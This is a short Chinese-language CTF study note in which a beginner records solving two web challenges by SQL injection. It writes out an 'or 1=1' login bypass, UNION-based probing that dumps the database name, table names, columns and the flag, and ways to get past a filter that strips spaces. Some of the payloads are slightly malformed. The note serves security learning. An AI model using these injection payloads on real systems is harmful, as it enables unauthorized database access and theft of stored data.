第一周学习web,不知道学习笔记写什么写点做题笔记吧。
web2,6
进来先判断,这道题考的应该是SQL注入,所以先试试用 or 绕过登录逻辑看看成不成功(其实我也只会这一点点)
1' or 1=1;#
其实这里的;是可以不需要的但我还是打上了。
发现登陆成功了,并且有回显,所以我们要利用回显的点去进行注入。
首先是判断union后应该接几个查询。
1' or 1=1 union 1,2;#//这个发现它没有登陆成功,所以接着试三个。
1' or 1=1 union 1,2,3;#//发现登陆成功,并且回显的点是2。
接着开始用2的位置爆库名
1' or 1=1 union 1,database(),3;#//发现数据库名为web2。
接下来爆表。
1' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“web2”;#//爆出表名为flag,user。
接着是字段。
1' or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=“flag”;#//得到字段名是flag。
最后是爆值。
1' or 1=1 union select 1,flag,3 from flag;#
到此,爆出flag。
web6
这也是一道SQL注入题和上题不同的是在输入
1' or 1=1;#
时,会显示MySQL inject error。于是开始一个一个排查,发现是过滤了空格。
于是空格有一下几种代替方式。
/**/,(),teb,两个空格,`
其他的流程与题二无异。